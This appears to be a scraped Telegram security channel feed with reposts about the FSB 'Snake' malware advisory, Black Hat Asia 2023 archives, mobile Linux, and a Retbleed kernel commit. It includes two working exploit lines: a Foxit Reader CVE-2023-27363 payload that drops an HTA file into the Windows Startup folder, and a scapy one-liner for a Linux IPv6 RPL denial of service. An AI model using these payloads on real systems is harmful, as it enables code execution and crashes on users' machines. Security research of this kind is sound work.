JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
3.5 MB
📕Hunting Russian Intelligence “Snake” Malware
📕Docket No. 23-MJ-0428(In the matter of the search of information associated with computers constituting the "Snake" malware network)
📰The Elite Hackers of the FSB
📰 Justice Department Announces Court-Authorized Disruption of the Snake Malware Network Controlled by Russia's Federal Security Service
🔍Memory-focused YARA rule based on the Volatility plugin
(hunting snake in memory, thx @msuiche)
🔎New Sigma-rules related to snake malware
⚙️Snake Malware Atomic Tests
#FSB #Turla #CSA #security #NSA #FBI #CISA #CNMF #NATO #NCSC #ACSC #malware #implant #Snake #Uroburos #attribution #TTPs #espionage #intelligence #C2
📕Docket No. 23-MJ-0428(In the matter of the search of information associated with computers constituting the "Snake" malware network)
📰The Elite Hackers of the FSB
📰 Justice Department Announces Court-Authorized Disruption of the Snake Malware Network Controlled by Russia's Federal Security Service
🔍Memory-focused YARA rule based on the Volatility plugin
(hunting snake in memory, thx @msuiche)
🔎New Sigma-rules related to snake malware
⚙️Snake Malware Atomic Tests
#FSB #Turla #CSA #security #NSA #FBI #CISA #CNMF #NATO #NCSC #ACSC #malware #implant #Snake #Uroburos #attribution #TTPs #espionage #intelligence #C2
👍1
Forwarded from Private Shizo
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from Private Shizo
CVE-2023-27363.pdf
443.4 KB
🔥🔥🔥Foxit PDF Reader
(CVE-2023-27363) - PoC here.
PoC is deeply based in the previous work made by Sebastian Apelt aka bitshifter123 and publicly available in this repository. So this exploits a path traversal vuln (four backslashes) + arbitrary file write (HTA)
exportXFAData Exposed Dangerous Method RCE Vulnerability (CVE-2023-27363) - PoC here.
PoC is deeply based in the previous work made by Sebastian Apelt aka bitshifter123 and publicly available in this repository. So this exploits a path traversal vuln (four backslashes) + arbitrary file write (HTA)
👍3
Private Shizo
arpwn.zip
foxit_cve_2023-27363_extracted.js
9.4 KB
timeout = app.setTimeOut("event.target.exportXFAData({cPath: \"/c/users/\" + identity.loginName + \"/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/evil.hta\"});👍5
BHasia2023.zip
914.5 MB
🗃Ваш покорный слуга скачал все доступные на данный момент презентации с Black Hat Asia 2023 и укомплектовал в архив.
🗃Your humble servant downloaded all currently available presentations from Black Hat Asia 2023 and archived them.
#BHasia #security #Bugs #expoitation #cryptography #Kernel #linux #ebpf #IoT #APT #espionage #CTI #DFIR #malware #privacy #mobile #GooglePixel #Rooting #Android #RF #HW #FW #RE #LockPick #JS #PrototypePollution #RCE #InsiderThreats #TTP #PMFault #FaultInjection #Windows #PPL #ransomware #AI #ML #DataScience #detection #OT #PLCs #RTUs #Schneider #LateralMovement #Arm #CodeInjection #WiFi #WPA3 #MCU #SCA #TimingAttacks #Chrome #fuzzing #WebSQL #hybridWar #Java #Gadgets_SSRF_RCE #EPZ #NTFS #LPE #Webkit #WASM #DNS #CFG #ETW #Shellcode #immutableCode #supplyChainAttacks #CriticalInfrastructure #IIoT
🗃Your humble servant downloaded all currently available presentations from Black Hat Asia 2023 and archived them.
#BHasia #security #Bugs #expoitation #cryptography #Kernel #linux #ebpf #IoT #APT #espionage #CTI #DFIR #malware #privacy #mobile #GooglePixel #Rooting #Android #RF #HW #FW #RE #LockPick #JS #PrototypePollution #RCE #InsiderThreats #TTP #PMFault #FaultInjection #Windows #PPL #ransomware #AI #ML #DataScience #detection #OT #PLCs #RTUs #Schneider #LateralMovement #Arm #CodeInjection #WiFi #WPA3 #MCU #SCA #TimingAttacks #Chrome #fuzzing #WebSQL #hybridWar #Java #Gadgets_SSRF_RCE #EPZ #NTFS #LPE #Webkit #WASM #DNS #CFG #ETW #Shellcode #immutableCode #supplyChainAttacks #CriticalInfrastructure #IIoT
🔥22❤4👍3
Forwarded from Mobile Adventures
Пару недель назад мы смотрели на каких устройствах стоит свежее ядро, но были неприятно удивлены, что даже на флагманах обновления прилетают с хорошим запозданием, влияя на безопасность устройств.
Но один хороший человек прислал скриншот телефона с установленными кедами (KDE), где был +- из последних версий ядро linux.
Это сподвигло меня изучить мир мобильного линукса.
Оказалось, что дистрибутивов достаточно для тестов и я взял за основу свой старый Asus ZenFone M1 и свежекупленный Oneplus 6.
На Асус смог накатить Ubuntu Touch, где спокойно запустил Waydroid. На Oneplus 6 накатывались postmarketOS и OpenSUSE Tumbleweed.
По использованию в течение дня могу сказать, что опыт с убунтой оказался более дружелюбным и более стабильным, чем вариант с Oneplus. OpenSUSE с кедами валился чаще, чем я мог предположить и "юзабилити" стремилось к нулю.
Ниже список ссылок на известные мне оси, которые вы можете посмотреть
https://get.opensuse.org/tumbleweed/ (образа тут)
https://ubuntu-touch.io/
https://mobian-project.org/
https://postmarketos.org/
https://sailfishos.org/
https://pureos.net/
Сделаю замечание - портативные линуха пока заводятся на Snapdragon 845. Имейте ввиду. Есть также поделки в виде Pinephone, но данный аппарат нужно будет заказать и потыкать вживую.
Также несмотря на то, что OpenSUSE сейчас сырой, посмотрим что скажут на ближайшей конференции. Может будут развивать мобильный вариант как альтернативу андроиду
Но один хороший человек прислал скриншот телефона с установленными кедами (KDE), где был +- из последних версий ядро linux.
Это сподвигло меня изучить мир мобильного линукса.
Оказалось, что дистрибутивов достаточно для тестов и я взял за основу свой старый Asus ZenFone M1 и свежекупленный Oneplus 6.
На Асус смог накатить Ubuntu Touch, где спокойно запустил Waydroid. На Oneplus 6 накатывались postmarketOS и OpenSUSE Tumbleweed.
По использованию в течение дня могу сказать, что опыт с убунтой оказался более дружелюбным и более стабильным, чем вариант с Oneplus. OpenSUSE с кедами валился чаще, чем я мог предположить и "юзабилити" стремилось к нулю.
Ниже список ссылок на известные мне оси, которые вы можете посмотреть
https://get.opensuse.org/tumbleweed/ (образа тут)
https://ubuntu-touch.io/
https://mobian-project.org/
https://postmarketos.org/
https://sailfishos.org/
https://pureos.net/
Сделаю замечание - портативные линуха пока заводятся на Snapdragon 845. Имейте ввиду. Есть также поделки в виде Pinephone, но данный аппарат нужно будет заказать и потыкать вживую.
Также несмотря на то, что OpenSUSE сейчас сырой, посмотрим что скажут на ближайшей конференции. Может будут развивать мобильный вариант как альтернативу андроиду
Get openSUSE
openSUSE Tumbleweed
Learn about the openSUSE distributions and download them for free
👍10❤3🤯1
0% Privacy
BHasia2023.zip
BHasia2023ToolsPoCs.zip
4.4 MB
🧰С некоторыми выступлениями с Black Hat Asia 2023 были представлены инструменты и PoCs, их тоже скачал и укомплектовал в архив(внутри есть txt-файл "List.txt", который содержит ссылки на оные и название докладов вместе с которыми были они предствалены).
🧰With some presentations from Black Hat Asia 2023, tools and POCs were presented, I also downloaded them and archived them (inside there is a txt file "List.txt" that contains links to them and the name of the presentation with which they were presented).
#BHasiaTools #security #Graph #TTPs #exploitation #RE #Arm #CodeInjection #Network #cryptography #WiFi #WiFi_Framework #transmitQueueManipulations #clientIsolationBypasses #intercept #MAC #browsers #WebAssembly #WebKit #fuzzing #XMap #ZMap #ICMP #EchoScans #TCP_SYN_scans #UDPprobes #DNS #malware #Shellcode #memory_scanning #CFG_bitmap #ETW #kernel_telemetry
🧰With some presentations from Black Hat Asia 2023, tools and POCs were presented, I also downloaded them and archived them (inside there is a txt file "List.txt" that contains links to them and the name of the presentation with which they were presented).
#BHasiaTools #security #Graph #TTPs #exploitation #RE #Arm #CodeInjection #Network #cryptography #WiFi #WiFi_Framework #transmitQueueManipulations #clientIsolationBypasses #intercept #MAC #browsers #WebAssembly #WebKit #fuzzing #XMap #ZMap #ICMP #EchoScans #TCP_SYN_scans #UDPprobes #DNS #malware #Shellcode #memory_scanning #CFG_bitmap #ETW #kernel_telemetry
❤5👍1
Forwarded from Private Shizo
💥Советую присмотреться к данному коммиту: 9a48d60 "x86/retbleed: Fix return thunk alignment ", связанному с изменениями в Retpoline (софтверная конструкция для предотвращения BTI, дающая возможность изолировать косвенные брэнчи от спекулятивного выполнения, являясь смягчением от нового класса сплоитов, тут первый коммит внедряющий Retpoline в ядро линукс ), направленными на "защиту/смягчение" от Retbleed путем использования SYM_START заместо
SYM_FUNC_START_LOCAL_NOALIGN(), ведущего к следующему расположение за счет добавления endbr( тем самым оставалось только 2 последних байта адреса и значение RET :"3c04: c3 ret" в __x86_return_thunk не находилось на границе в 64 байта для выравнивания в пределах BTB ):3bff <zen_untrain_ret>:
3bff: f3 0f 1e fa endbr64
3c03: f6 test $0xcc,%bl
3c04 <__x86_return_thunk>:
3c04: c3 ret
3c05: cc int3
3c06: 0f ae e8 lfenceGitHub
x86/retbleed: Fix return thunk alignment · torvalds/linux@9a48d60
SYM_FUNC_START_LOCAL_NOALIGN() adds an endbr leading to this layout
(leaving only the last 2 bytes of the address):
3bff <zen_untrain_ret>:
3bff: f3 0f 1e fa en...
(leaving only the last 2 bytes of the address):
3bff <zen_untrain_ret>:
3bff: f3 0f 1e fa en...
👍1
Forwarded from Private Shizo
🔥🔥🔥Linux IPv6 "Route of Death" 0day
This vulnerability allows remote attackers to create a DoS condition on affected installations of Linux Kernel. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the handling of the RPL protocol. The issue results from the lack of proper handling of user-supplied data, which can result in an assertion failure. An attacker can leverage this vulnerability to create a DoS condition on the system.
PoC:
This vulnerability allows remote attackers to create a DoS condition on affected installations of Linux Kernel. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the handling of the RPL protocol. The issue results from the lack of proper handling of user-supplied data, which can result in an assertion failure. An attacker can leverage this vulnerability to create a DoS condition on the system.
PoC:
from scapy.all import *; p=IPv6(dst=target_ipv6_addr)/IPv6ExtHdrSegmentRouting(type=3, addresses=['a8::', 'a7::', 'a6::'], segleft=1, lastentry=0xf0);send(p)
⚠️It was assigned CVE-2023-2156 but the bug patch didn't solve the underlying problem (ZDI confirmed this too), so we're still expecting another patch at somepoint. However, it has now been released as an 0day. Massive props to ZDI for relentlessly chasing up the fix over the past year.